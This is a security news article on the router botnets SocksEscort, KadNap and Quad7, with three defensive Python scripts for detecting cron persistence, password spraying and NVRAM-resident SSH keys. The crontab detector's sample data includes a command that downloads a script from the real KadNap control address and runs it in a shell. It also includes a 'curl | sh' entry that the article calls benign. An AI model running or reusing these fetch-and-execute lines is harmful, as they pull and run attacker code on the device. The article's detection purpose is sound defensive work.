Your Router Is Someone Else's Crime Tool

Three separate router botnet campaigns hit the news within days of each other this month. One was dismantled by a nine-country law enforcement coalition after six years of operation. Another is still running right now with 14,000 infected devices. A third has been quietly targeting Microsoft 365 accounts for years on behalf of a Chinese state-linked threat actor. None of the device owners knew a thing.

The router sitting between you and the internet is, for a criminal botnet operator, close to an ideal piece of infrastructure. It runs continuously. It has a residential IP address that bypasses most blocklists. It has no antivirus software, no endpoint detection, and no user paying attention to it. In many cases it runs firmware that was never updated after the day it was unboxed. And because routers exist at the edge of the network rather than inside it, they are largely invisible to the security tools organizations use to monitor their own environments.

This combination of factors has produced an economy. Criminal proxy services buy access to infected routers in bulk, then sell that access to other criminals who use it to commit fraud, launch credential-stuffing attacks, distribute ransomware, and run DDoS campaigns. The device owner pays the electricity bill. The criminal pays the proxy subscription. Everyone else absorbs the cost of the crimes being committed through that connection.

Why Routers Are the Preferred Target

Routers and edge networking devices share a set of characteristics that make them structurally attractive for botnet operators, and those characteristics have not changed much over the years. The core problem is that consumer and small-office routers were built to be deployed once and forgotten. There is no automatic update mechanism in most models. Vendors support hardware until it reaches end-of-life, and then it stops receiving patches entirely. The device keeps working as a router, so the owner has no reason to replace it, but its firmware accumulates unpatched vulnerabilities over time.

Research from Forescout Vedere Labs, which analyzed ninety days of honeypot data, found that OT perimeter devices like routers accounted for 67 percent of all recorded attacks on connected devices. That figure reflects something real: these devices are not just targeted because they are vulnerable. They are targeted because compromising one gives an attacker a persistent, trusted vantage point inside a network that is difficult to detect and difficult to evict from.

The FBI described the structural problem plainly in a flash alert published this month alongside the SocksEscort takedown: routers and IoT devices "often lack Anti-Virus, Endpoint Detection and Response, or other software which might allow a network owner to detect the malware." That absence of detection capability is not a bug in the attacker's plan. It is the plan.

"Threat actors are aware of these vulnerabilities and exploit them to install malware, gain control of the device, and sell access to them as residential proxies." — FBI Flash Alert, March 2026

SocksEscort: A Sixteen-Year Operation Dismantled

On March 11, 2026, Europol and the U.S. Department of Justice announced the takedown of SocksEscort, a criminal residential proxy service that had been operating since approximately 2009 and had been selling access to compromised routers since at least the summer of 2020. The operation, codenamed Operation Lightning, involved law enforcement agencies from Austria, Bulgaria, France, Germany, Hungary, the Netherlands, Romania, and the United States. Authorities seized 34 domains and 23 servers across seven countries and froze $3.5 million in cryptocurrency.

The scale of what was dismantled is worth pausing on. Since 2020, SocksEscort had offered access to approximately 369,000 different IP addresses across 163 countries. As of February 2026, just before the takedown, the service listed around 8,000 active infected routers for sale, with 2,500 of those located in the United States. The service's payment platform had received more than $5.7 million from its customers over its operational life.

SocksEscort — Attack Chain Overview

  1. Scan for vulnerable routers
  2. RCE / command injection exploit
  3. Deploy AVrecon, flash firmware
  4. Disable updates, establish C2
  5. Sell proxy access to criminals

SocksEscort attack chain — routers were permanently infected via custom firmware, then sold as anonymous proxy nodes to paying criminal customers

The malware behind SocksEscort was called AVrecon. It is written in C and primarily targets devices running MIPS and ARM architectures, which covers the vast majority of consumer and small-office routers. AVrecon spread by scanning for internet-connected devices with exposed vulnerable services and then exploiting remote code execution flaws, command injection vulnerabilities, and weaknesses in exposed SOAP interfaces. Once inside a device, it established a remote shell to an attacker-controlled server and set up a modular command-and-control framework that could be extended with new exploit modules as needed.

What made SocksEscort particularly difficult to displace was its persistence mechanism. Rather than simply dropping a file on the device's filesystem, the operators used the router's own built-in update mechanism to flash a custom firmware image containing a copy of AVrecon, hard-coded to execute on device startup. The modified firmware also disabled the device's update and flashing features entirely, meaning the router could not be patched or reflashed without physical access. Firmware updates would not remove the infection. The device was, for practical purposes, permanently compromised.

The FBI noted that AVrecon targeted approximately 1,200 device models manufactured by Cisco, D-Link, Hikvision, MikroTik, NETGEAR, TP-Link, and Zyxel. The most commonly abused models included D-Link DIR-818LW, DIR-850L, and DIR-860L routers, Netgear DGN2200v4 and R7000 units, TP-Link Archer C20, TL-WR840N, TL-WR849N, and WR841N models, and nine Zyxel models including the VMG3925-B10A and VMG3925-B10C. Many of these devices were deployed by ISPs and supplied directly to customers, sometimes under rebranded names.

The crimes facilitated through the SocksEscort network were not abstract. The DOJ cited specific documented cases: a cryptocurrency investor in New York who lost $1 million, a manufacturing company in Pennsylvania that lost $700,000, and U.S. service members whose MILITARY STAR card accounts were defrauded of $100,000. The service was also used to facilitate ransomware distribution, DDoS attacks, and the distribution of child sexual abuse material. Europol's executive director, Catherine De Bolle, described the underlying dynamic in a statement accompanying the announcement.

"Cybercrime thrives on anonymity. Proxy services like SocksEscort provide criminals with the digital cover they need to launch attacks, distribute illegal content and evade detection. By dismantling this infrastructure, law enforcement has disrupted a service that enabled cybercrime on a global scale." — Catherine De Bolle, Executive Director, Europol

Lumen's Black Lotus Labs, which assisted in the investigation, noted that over the past several years SocksEscort maintained an average of approximately 20,000 distinct victims weekly, with communications routed through an average of 15 command-and-control nodes. The investigation began in June 2025; the Shadowserver Foundation also assisted alongside Black Lotus Labs. An FBI official told The Record that SocksEscort had 124,000 users, and that seized servers would be used to target other cybercriminal activity.

KadNap: The Botnet Still Running Today

While SocksEscort is gone, it has not taken the market for criminal proxy services with it. A newer botnet called KadNap, first detected in August 2025, was publicly disclosed by Black Lotus Labs in March 2026 with more than 14,000 infected devices already compromised, over 60 percent of them in the United States. KadNap primarily targets ASUS routers, though its operators have deployed it against a broader range of edge networking devices.

KadNap operates differently from SocksEscort in one technically significant way. Rather than using a traditional command-and-control infrastructure with centralized servers, KadNap uses a customized version of the Kademlia Distributed Hash Table protocol — the same decentralized peer-to-peer architecture used by some file-sharing networks. This makes the botnet substantially more resilient than one relying on fixed C2 servers, because there is no single infrastructure point that can be seized to disrupt communications.

The attack chain begins with a shell script called aic.sh, downloaded from a C2 server at IP address 212.104.141[.]140. This script creates a cron job that retrieves the shell script at the 55-minute mark of every hour, renames it to .asusrouter, and runs it. The naming convention is deliberate camouflage — a file called .asusrouter on an ASUS router is designed to look like a legitimate system process.
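The persistence described above leaves a recognisable footprint in the device's crontab: a job pinned to one minute of every hour, a download from a bare IP address, and a dot-prefixed file written to and executed from a temporary directory. The following checker is an added example written for this article, not Black Lotus Labs' tooling. It scores crontab entries against those heuristics so that a single odd trait (a legitimate hourly job, say) does not raise an alert on its own. The sample crontab is constructed; it reuses only the C2 address and the .asusrouter file name given in the text, with the address written undefanged so the regex matches it.

```python
"""Flag crontab entries that match the KadNap-style persistence pattern:
a job pinned to one minute of every hour that fetches a script from a bare
IP address and writes or executes a dot-prefixed file. Added example; the
sample crontab below is constructed for illustration."""
import re

# Constructed sample crontab. Line 3 mirrors the pattern described in the
# article; the other entries are benign fillers written for this example.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
55 * * * * wget -q -O /tmp/.asusrouter http://212.104.141.140/aic.sh && sh /tmp/.asusrouter
*/15 * * * * /opt/ddns/update.sh
30 2 * * 0 curl -s https://updates.example.net/check | sh
"""

CRON_FIELDS = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(\S+)\s+(.+)$")
BARE_IP_URL = re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}\b")
FETCHER = re.compile(r"\b(?:wget|curl|tftp)\b")
INTO_SHELL = re.compile(r"(?:\||&&|;)\s*(?:sh|bash|ash)\b")
# A dot-prefixed name at the start of a path component, e.g. /tmp/.asusrouter
HIDDEN_FILE = re.compile(r"(?:^|[\s/])\.[A-Za-z0-9_-]+")


def analyze_cron(text):
    """Return one finding per non-comment entry that triggers any heuristic.

    Each finding is {"line": n, "command": str, "reasons": [str, ...]}.
    """
    findings = []
    for number, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        m = CRON_FIELDS.match(line)
        if not m:
            continue
        minute, hour, command = m.group(1), m.group(2), m.group(6)
        reasons = []
        if minute.isdigit() and hour == "*":
            reasons.append("pinned to one minute of every hour")
        if FETCHER.search(command):
            reasons.append("downloads content at run time")
            if BARE_IP_URL.search(command):
                reasons.append("fetches from a bare IP address")
        if INTO_SHELL.search(command):
            reasons.append("feeds or chains a download into a shell")
        if HIDDEN_FILE.search(command):
            reasons.append("references a dot-prefixed (hidden) file")
        if reasons:
            findings.append({"line": number, "command": command, "reasons": reasons})
    return findings


def high_confidence(findings, min_reasons=3):
    """Keep only entries where several independent heuristics fire together."""
    return [f for f in findings if len(f["reasons"]) >= min_reasons]


if __name__ == "__main__":
    for f in analyze_cron(SAMPLE_CRONTAB):
        print(f"line {f['line']}: {', '.join(f['reasons'])}")
        print(f"    {f['command']}")
```

Run it against the output of `crontab -l` (or the contents of /var/spool/cron on the device) collected during an incident review; the threshold in high_confidence is the knob to tune once you know which benign hourly jobs your fleet runs.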

Note

Black Lotus Labs has published indicators of compromise for KadNap. If you operate your own firewall or IDS infrastructure, adding these IoCs to your block lists is a direct countermeasure. Lumen has also taken steps to block traffic to KadNap's known control infrastructure on its own network backbone.

Once infected, the device is enrolled in the peer-to-peer network and marketed through a proxy service called Doppelgänger, operating at doppelganger[.]shop. The service advertises residential proxies across more than 50 countries, claiming complete anonymity for customers. Researchers assess Doppelgänger to be a rebrand of Faceless, an older proxy service previously associated with the TheMoon malware — which also targeted ASUS routers. The service appears to have launched in May or June 2025, just months before KadNap was first detected.

Black Lotus Labs described what sets KadNap apart from similar botnets in a statement accompanying their disclosure: "The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control. Their intention is clear — avoid detection and make it difficult for defenders to protect against."

The customer base for a service like Doppelgänger uses the access for credential stuffing, DDoS attacks, brute-force campaigns, and ad fraud. The device owners hosting this traffic have no awareness it is occurring. KadNap's current scale is smaller than SocksEscort's peak, but its decentralized architecture makes it more resistant to the kind of coordinated infrastructure seizure that ended SocksEscort's run.

Quad7: State-Sponsored Password Spraying

Not every router botnet is criminal-for-hire. The Quad7 botnet — also tracked as CovertNetwork-1658, Xlogin, and 7777 — represents a different category entirely. Quad7 is assessed by Microsoft and multiple security firms to be operated by, or on behalf of, Storm-0940, a Chinese state-sponsored threat actor. Where SocksEscort and KadNap are financial crime infrastructure, Quad7 is espionage infrastructure.

The botnet gets its name from the TCP port 7777 that infected routers expose as a backdoor shell. Devices compromised by Quad7 also run a SOCKS5 proxy on port 11288, which is used to relay authentication attempts against external services. The primary use observed by researchers has been systematic, low-rate password spraying against Microsoft 365 accounts — submitting roughly one authentication attempt per account per day to stay below detection thresholds while working through large volumes of targets.

In September 2025, TP-Link disclosed that two vulnerabilities in its Archer C7 and TL-WR841N/ND routers were being actively chained by Quad7 operators. CVE-2025-50224 is an authentication bypass flaw that allows an attacker to steal credentials stored on the router. CVE-2025-9377 is a command injection remote code execution vulnerability in the router's Parental Control feature. Chained together, they give an attacker full device compromise from an unauthenticated position over the network. CISA added CVE-2025-9377 to its Known Exploited Vulnerabilities catalog in August 2025. TP-Link issued firmware updates for both affected models despite their end-of-life status, given the severity of the active exploitation.

At its peak, Quad7 had compromised over 16,000 devices worldwide, with a concentration in Bulgaria, Russia, the United States, and Ukraine. Sekoia.io researchers, who conducted a detailed analysis of the botnet, noted that authentication attempts relayed through Quad7 have a distinctive fingerprint visible in Microsoft Entra ID sign-in logs: they use an outdated Chrome user-agent string and authenticate via an application ID corresponding to Microsoft Azure PowerShell, which does not support modern authentication flows. Organizations monitoring interactive sign-in events would miss these attempts entirely because they occur through a different authentication path.
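The fingerprint Sekoia.io describes is detectable from sign-in logs alone: many distinct accounts failing from one source address, no account tried more than about once a day, every attempt arriving over the non-interactive path with a stale Chrome user-agent and the Azure PowerShell application ID. The script below is an added example written for this article, not Sekoia.io's or Microsoft's detection logic. It assumes a simplified record layout (a subset of the Entra ID sign-in log fields), assumes the public first-party client ID of Microsoft Azure PowerShell is the value that appears under appId, and treats Chrome majors below 100 as stale; the sample records are constructed, with a spray source on 203.0.113.10 and one user mistyping a password from 198.51.100.7.

```python
"""Detect low-and-slow, non-interactive password spraying in Entra ID
sign-in records. Added example; the record layout is a simplified subset
of the sign-in log schema and the sample records are constructed."""
from collections import defaultdict
import re

# Public first-party client ID of Microsoft Azure PowerShell (assumption:
# this is the appId your tenant's logs show for the relayed attempts).
AZURE_POWERSHELL_APP_ID = "1950a258-227b-4e31-a9cf-717495945fc2"
CONSTRUCTED_BROWSER_APP = "00000000-0000-0000-0000-00000000beef"  # placeholder
LEGACY_CHROME_MAJOR = 100  # assumption: Chrome majors below this are stale
CHROME_RE = re.compile(r"Chrome/(\d+)")

OLD_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
          "(KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36")
CURRENT_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")


def _rec(time, user, ip, ua, app_id, interactive, error_code):
    return {"time": time, "user": user, "ip": ip, "ua": ua, "appId": app_id,
            "interactive": interactive, "errorCode": error_code}


# Constructed sample: six accounts sprayed once per day over two days from
# 203.0.113.10 (error 50126 = invalid username or password), plus one user
# who mistypes a password three times from a browser and then succeeds.
SAMPLE_SIGNINS = (
    [_rec(f"2026-03-1{d}T0{h}:05:00", f"user{h}@example.com", "203.0.113.10",
          OLD_UA, AZURE_POWERSHELL_APP_ID, False, 50126)
     for d in (0, 1) for h in range(1, 7)]
    + [_rec(f"2026-03-10T09:0{i}:00", "alice@example.com", "198.51.100.7",
            CURRENT_UA, CONSTRUCTED_BROWSER_APP, True, 50126) for i in range(3)]
    + [_rec("2026-03-10T09:04:00", "alice@example.com", "198.51.100.7",
            CURRENT_UA, CONSTRUCTED_BROWSER_APP, True, 0)]
)


def chrome_major(ua):
    m = CHROME_RE.search(ua)
    return int(m.group(1)) if m else None


def find_spray_sources(records, min_users=5, max_per_user_per_day=1):
    """Return {ip: summary} for sources whose failures look like relayed spraying.

    A source qualifies when it fails against at least min_users distinct
    accounts while never exceeding max_per_user_per_day attempts on any one
    account in a day. The traits list records which Quad7 fingerprints
    (non-interactive path, Azure PowerShell appId, stale Chrome UA) also hold.
    """
    by_ip = defaultdict(list)
    for r in records:
        if r["errorCode"] != 0:
            by_ip[r["ip"]].append(r)

    findings = {}
    for ip, fails in by_ip.items():
        users = {r["user"] for r in fails}
        if len(users) < min_users:
            continue
        per_user_day = defaultdict(int)
        for r in fails:
            per_user_day[(r["user"], r["time"][:10])] += 1
        if max(per_user_day.values()) > max_per_user_per_day:
            continue  # noisy brute force, not the low-and-slow pattern
        traits = []
        if all(not r["interactive"] for r in fails):
            traits.append("non-interactive only")
        if all(r["appId"] == AZURE_POWERSHELL_APP_ID for r in fails):
            traits.append("Azure PowerShell app ID")
        majors = [chrome_major(r["ua"]) for r in fails]
        if all(m is not None and m < LEGACY_CHROME_MAJOR for m in majors):
            traits.append("stale Chrome user-agent")
        findings[ip] = {"distinct_users": len(users),
                        "failures": len(fails), "traits": traits}
    return findings


if __name__ == "__main__":
    for ip, summary in find_spray_sources(SAMPLE_SIGNINS).items():
        print(ip, summary)
```

The point of the per-user-per-day ceiling is that a conventional lockout or brute-force rule never fires on this traffic; the signal is the breadth across accounts from one source, which only appears once you aggregate failures by IP over a day or more and include the non-interactive sign-in log rather than the interactive one alone.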

"Organizations relying solely on interactive sign-in monitoring are blind to these attacks." — SecurityScorecard warning on router-based password spraying

In February 2025, SecurityScorecard disclosed a related campaign involving a botnet of approximately 130,000 devices targeting Microsoft 365 service accounts globally. That campaign exploited Basic Authentication — an older method that transmits credentials without supporting multi-factor authentication — allowing attackers to bypass MFA entirely. Microsoft had been working toward deprecating Basic Auth since 2023. The campaigns targeting it are a direct response to the window of opportunity that deprecation timeline created.

A separate ASUS router campaign disclosed in May 2025 by GreyNoise added another layer to the picture. Researchers observed a stealth operation using CVE-2023-39780 and two authentication bypass techniques without assigned CVEs to compromise nearly 9,000 ASUS routers. The attacker's method was notable for what it left behind: no malware files on disk. Instead, SSH access was enabled via official ASUS router settings, and a custom public SSH key was inserted into the device's authorized keys file. The configuration was stored in NVRAM, not on disk, meaning firmware updates would not remove the backdoor.
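Because the backdoor described above lives in NVRAM rather than on the filesystem, a file-integrity check of the firmware image says nothing about it; what needs auditing is the SSH configuration state the router actually holds. The checker below is an added example written for this article, not GreyNoise's or ASUS's tooling. It assumes ASUSWRT-style variable names (sshd_enable, sshd_wan, sshd_authkeys, as read with `nvram get`) and newline-separated keys in sshd_authkeys; confirm both against your model before relying on it. The sample values and the key bodies are constructed, and every key is compared by its SHA256 fingerprint against an allowlist rather than by its comment, since a planted key can carry any comment it likes.

```python
"""Audit SSH-related NVRAM settings for an NVRAM-resident SSH backdoor:
SSH enabled, possibly WAN-facing, with an authorized key that is not on the
allowlist. Added example; variable names follow ASUSWRT-style firmware and
are an assumption to confirm on your model. Sample values are constructed."""
import base64
import hashlib


def _fake_key(comment, seed):
    """Constructed placeholder key line: base64 of a hash, not a real key."""
    body = base64.b64encode(hashlib.sha256(seed.encode()).digest()).decode()
    return f"ssh-ed25519 {body} {comment}"


# The one key the administrator actually installed (constructed).
KNOWN_GOOD_KEYS = [_fake_key("admin@laptop", "good-key")]

# Constructed `nvram get` output: SSH on, reachable from WAN, and a second
# key with no comment appended to the authorized keys.
SAMPLE_NVRAM = {
    "sshd_enable": "1",
    "sshd_wan": "1",
    "sshd_authkeys": "\n".join([KNOWN_GOOD_KEYS[0], _fake_key("", "planted")]),
}


def fingerprint(key_line):
    """SHA256 fingerprint of the key material in OpenSSH's display form."""
    parts = key_line.split()
    if len(parts) < 2:
        return None
    try:
        raw = base64.b64decode(parts[1], validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return None
    digest = hashlib.sha256(raw).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def audit_ssh_nvram(nvram, allowed_fingerprints, key_sep="\n"):
    """Return a list of human-readable findings; an empty list means clean.

    nvram is a mapping of variable name to value, as produced by `nvram get`.
    """
    findings = []
    if nvram.get("sshd_enable", "0") != "0":
        findings.append("sshd enabled")
        if nvram.get("sshd_wan", "0") == "1":
            findings.append("sshd reachable from WAN")
    for line in nvram.get("sshd_authkeys", "").split(key_sep):
        if not line.strip():
            continue
        fp = fingerprint(line)
        if fp is None:
            findings.append(f"unparseable authorized key entry: {line[:40]!r}")
        elif fp not in allowed_fingerprints:
            comment = " ".join(line.split()[2:]) or "<no comment>"
            findings.append(f"unexpected authorized key {fp} ({comment})")
    return findings


if __name__ == "__main__":
    allowed = {fingerprint(k) for k in KNOWN_GOOD_KEYS}
    for finding in audit_ssh_nvram(SAMPLE_NVRAM, allowed):
        print(finding)
```

If this reports a key you did not install, the text above explains why a firmware update will not clear it: the remediation is a factory reset (which clears NVRAM) followed by manual reconfiguration from a known-good baseline, and the allowlist of fingerprints is what lets you verify the rebuilt state.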

The Bigger Pattern

Viewed together, these campaigns reveal something about how attackers have come to think about routers. They are not just vulnerable devices. They are a commodity resource — a type of infrastructure that can be mined, monetized, and maintained at scale with relatively low effort once an exploit is available.

The RondoDox botnet, active throughout 2025, demonstrates what scaled exploitation looks like in practice. Researchers at CloudSEK documented RondoDox operating across three phases: initial reconnaissance from March through April 2025, daily mass exploitation of IoT devices and web applications from April through June, and then hourly automated deployment at large scale from July onward. By December 2025, the campaign had incorporated CVE-2025-55182, a critical remote code execution flaw in React Server Components and Next.js frameworks with a CVSS score of 10.0, affecting an estimated 90,300 exposed instances at year's end. RondoDox also deployed a variant of Mirai on compromised devices — the same Mirai lineage that has been circulating through router ecosystems since 2016.

Mirai's persistence as a threat is itself instructive. It first appeared in 2016, its source code was published that same year, and variants of it continue to appear in new campaigns nearly a decade later. Routers running the same firmware vulnerabilities Mirai originally exploited are still online today because their owners have never applied a patch, or because no patch was ever issued for their model, or because patching a router is not something a typical home or small-business user thinks to do.

Operation WrtHug, disclosed by SecurityScorecard's STRIKE team in November 2025, targeted specific end-of-life ASUS router models using CVE-2025-2492, an improper authentication control flaw rated 9.2 on the CVSS scale. Researchers identified over 50,000 unique IP addresses associated with compromised devices globally. The campaign's operators left a distinctive marker: infected routers shared a unique TLS certificate valid for 100 years, an indicator of an operator planning for very long-term persistence.

The Quad7 botnet, meanwhile, illustrates that this is not exclusively a criminal enterprise problem. State actors have reached the same conclusion about routers that criminal proxy services did: they are reliable, persistent, and essentially invisible to most defenders. When a nation-state threat actor wants to conduct espionage or credential theft at scale while obscuring their origin, routing traffic through tens of thousands of compromised home routers is a solved problem.

Affected Device Models

The FBI's flash alert on AVrecon specifically named the following commonly abused models: D-Link DIR-818LW, DIR-850L, DIR-860L; Hikvision IP cameras; Netgear DGN2200v4, R7000; TP-Link Archer C20, TL-WR840N, TL-WR849N, WR841N; and Zyxel VMG3925-B10A, VMG3925-B10C among others. If you operate any of these models, treat them as compromised until verified clean. Many were distributed by ISPs under rebranded names.

Key Takeaways

  1. Update firmware now, not eventually. The vulnerabilities being exploited across KadNap, SocksEscort, Quad7, and Operation WrtHug are known and documented. Many are patched in current firmware releases. Running outdated firmware on any internet-connected router is an open invitation. Schedule quarterly firmware checks as a minimum cadence.
  2. Replace end-of-life hardware. Patches cannot fix a device that is no longer supported. TP-Link issued emergency firmware for end-of-life models specifically because active exploitation was documented. That is not a sustainable posture. If your router model is end-of-life, the vendor cannot protect it and you cannot protect it. Replace it.
  3. Disable remote management unless you have a specific operational need. The Quad7 botnet's exploitation of TP-Link routers requires that the remote administration interface be exposed to the internet. It is disabled by default. Leaving it enabled without a documented operational reason is unnecessary attack surface.
  4. Change default credentials immediately. A significant portion of router compromises — across every campaign described here — begin with weak or default credentials. Default username and password combinations are publicly documented for every consumer router model. There is no environment in which the factory default is an acceptable credential.
  5. Monitor for SocksEscort's persistence technique specifically. If you manage routers that may have been exposed to AVrecon, a factory reset followed by manual reconfiguration is necessary. Firmware updates alone will not remove the infection because the malware flashed custom firmware that disabled future update capability. The FBI's flash alert contains the full list of IoCs.

The SocksEscort takedown is a genuine law enforcement success, and it is worth acknowledging as one. A nine-country coalition dismantled infrastructure that had been operational for sixteen years and had facilitated millions of dollars in documented consumer fraud. At the same time, KadNap is still running. Quad7 is still running. New campaigns will emerge to fill the gap SocksEscort left behind, because the underlying conditions that made all of these operations possible — unpatched firmware, default credentials, no monitoring, no detection capability — have not changed. The router botnet economy exists because the supply of vulnerable devices is essentially unlimited and the cost of exploitation is very low. That equation does not resolve itself.
